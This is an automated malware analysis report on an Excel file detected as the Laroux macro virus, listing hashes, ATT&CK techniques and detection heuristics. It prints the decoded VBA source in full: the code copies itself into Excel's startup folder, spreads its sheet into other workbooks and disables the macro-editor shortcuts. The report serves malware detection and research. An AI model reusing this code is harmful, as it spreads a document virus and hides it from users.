Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 df0e1c3311baef65…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 22.0 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2021-11-22
MD5: dcf1a44c406b1bbf307fc463a112fe53
SHA-1: 6f03fb1a4c767acf93dea21de6ae15940aa53464
SHA-256: df0e1c3311baef6572568afd6a05e704bc6e76c081a6fe7886242e47846b09b5
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The file contains a VBA macro with an Auto_Open subroutine, indicating it is designed to execute automatically upon opening. The script attempts to copy itself to the Excel startup folder as 'StartUp.xls' and sets up event handlers, suggesting an intent to establish persistence. The ClamAV detection 'Doc.Macro.Laroux-5893719-0' further supports its malicious nature.

Heuristics (3)

  • ClamAV: Doc.Macro.Laroux-5893719-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 925 bytes
SHA-256: 09db81543d44278cb9676ed8a1a5ed70737b46a962cd0edd970849e780ee527b
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"

Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub



Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = ture
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
    End Sub